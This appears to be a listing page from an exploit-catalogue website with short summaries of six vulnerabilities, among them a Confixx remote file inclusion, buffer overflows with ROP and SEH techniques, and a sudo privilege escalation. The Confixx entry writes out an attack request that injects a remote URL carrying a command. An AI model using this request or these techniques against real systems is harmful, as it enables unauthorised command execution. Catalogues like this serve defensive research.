header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Painkiller Code Execution Vulnerability

This exploit allows remote attackers to execute arbitrary code on a vulnerable Painkiller game server. The vulnerability exists due to a code execution bug in the Painkiller game server. By sending a specially crafted packet to the server, an attacker can control the code flow and execute arbitrary code.

Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability

The Confixx PRO version 3.3.1 is vulnerable to remote file inclusion. An attacker can access the file saveserver.php without authentication. The vulnerability exists due to the variable $thisdir not being defined in the code. By exploiting this vulnerability, an attacker can execute arbitrary commands on the target system. The conditions for exploitation are that the open_basedir restriction is turned off and allow_url_fopen is set to on. The attacker can send a POST request or a GET request to the saveserver.php file with the parameter thisdir set to a malicious URL that includes the command to be executed. For example, the attacker can send a POST request with thisdir set to http://[yoursite]/images/1.jpg?&cmd=ls -la or a GET request with saveserver.php?thisdir=http://[yoursite]/images/1.jpg?&cmd=ls -la.

Easy File Sharing Web Server 7.2 – ‘POST’ Buffer Overflow (DEP Bypass with ROP)

This exploit targets Easy File Sharing Web Server version 7.2 and utilizes a buffer overflow vulnerability in the 'POST' request. It bypasses DEP (Data Execution Prevention) using ROP (Return-Oriented Programming) techniques. The exploit is written in Python and uses a crafted shellcode to execute arbitrary commands.

Linux_sudo_CVE-2017-1000367

This exploit allows an attacker with physical access to a system to gain root privileges by exploiting a vulnerability in the sudo program. By creating a large number of pseudo-terminals (pts), the attacker can overflow a buffer in the sudo program and execute arbitrary code with root privileges. The vulnerability was reported by Qualys, Inc. and assigned CVE-2017-1000367.

Easy MOV Converter 1.4.24 – ‘Enter User Name’ Field Buffer Overflow (SEH)

This exploit takes advantage of a buffer overflow vulnerability in the 'Enter User Name' field of Easy MOV Converter version 1.4.24. By pasting a specially crafted payload into this field, an attacker can overwrite the Structured Exception Handler (SEH) and gain control over the program's execution flow. The exploit uses a combination of a long string of 'A' characters, a short jump instruction, and a return address to redirect execution to the attacker's code. The payload included in this exploit launches the Windows calculator (calc.exe) as a proof of concept.

Out-of-bounds Heap Read in ASFParser::ParseHeaderExtensionObjects

There is a memcpy in ASFParser::ParseHeaderExtensionObjects which doesn't check that the size of the copy is smaller than the size of the source buffer, resulting in an out-of-bounds heap read. The vulnerable code appears to be in handling the parsing of an extension object of type ASF_Metadata_Object with a Description Record with an overly large length. This issue probably allows leaking mediaserver memory from an app process on the device via the retrieved metadata.

Recent Exploits: